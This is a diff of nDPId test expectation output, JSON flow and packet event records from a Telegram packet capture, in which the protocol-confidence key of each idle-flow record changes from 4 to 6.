00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1389,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1588779650842,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1588779650842,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACaJ+EAAAER35rAqAE17\/\/\/+txAB2wAhjvUTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1481,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1588779652844,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1588779652844,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACajVgAAAEReiPAqAE17\/\/\/+txAB2wAhjvUTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} -00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779629044,"flow_last_seen":1588779629045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779615019,"flow_last_seen":1588779615032,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779625981,"flow_last_seen":1588779625981,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1588779596451,"flow_last_seen":1588779651446,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":3348,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779601222,"flow_last_seen":1588779632305,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":928,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":123,"flow_first_seen":1588779616036,"flow_last_seen":1588779620617,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":21280,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.7","src_port":23174,"dst_port":521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1588779616036,"flow_last_seen":1588779618928,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":23174,"dst_port":523,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588779616036,"flow_last_seen":1588779619034,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":23174,"dst_port":527,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1588779616036,"flow_last_seen":1588779618946,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.1","src_port":23174,"dst_port":536,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588779616036,"flow_last_seen":1588779619007,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.4","src_port":23174,"dst_port":538,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588779616036,"flow_last_seen":1588779618748,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":23174,"dst_port":538,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00816{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779619914,"flow_last_seen":1588779619916,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} +00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779629044,"flow_last_seen":1588779629045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779615019,"flow_last_seen":1588779615032,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61120,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779625981,"flow_last_seen":1588779625981,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1588779596451,"flow_last_seen":1588779651446,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":3348,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779601222,"flow_last_seen":1588779632305,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":928,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":123,"flow_first_seen":1588779616036,"flow_last_seen":1588779620617,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":21280,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.7","src_port":23174,"dst_port":521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1588779616036,"flow_last_seen":1588779618928,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":23174,"dst_port":523,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588779616036,"flow_last_seen":1588779619034,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":23174,"dst_port":527,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1588779616036,"flow_last_seen":1588779618946,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.1","src_port":23174,"dst_port":536,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588779616036,"flow_last_seen":1588779619007,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.4","src_port":23174,"dst_port":538,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588779616036,"flow_last_seen":1588779618748,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":23174,"dst_port":538,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00816{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779619914,"flow_last_seen":1588779619916,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615962,"flow_last_seen":1588779615962,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip6","src_ip":"fe80::4dc:edec:5b0c:a661","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779601223,"flow_last_seen":1588779632305,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":928,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779611355,"flow_last_seen":1588779611657,"flow_idle_time":200000,"flow_min_l4_payload_len":125,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"239.255.255.250","src_port":57916,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779600828,"flow_last_seen":1588779600842,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779626394,"flow_last_seen":1588779626394,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779626393,"flow_last_seen":1588779626393,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.43","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779650652,"flow_last_seen":1588779650666,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779603320,"flow_last_seen":1588779603320,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.53","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1588779597291,"flow_last_seen":1588779653520,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":2502,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.75","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":120,"flow_first_seen":1588779596708,"flow_last_seen":1588779655297,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":19803,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1588779596465,"flow_last_seen":1588779654853,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":2177,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.69","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779601223,"flow_last_seen":1588779632305,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":928,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779611355,"flow_last_seen":1588779611657,"flow_idle_time":200000,"flow_min_l4_payload_len":125,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"239.255.255.250","src_port":57916,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779600828,"flow_last_seen":1588779600842,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 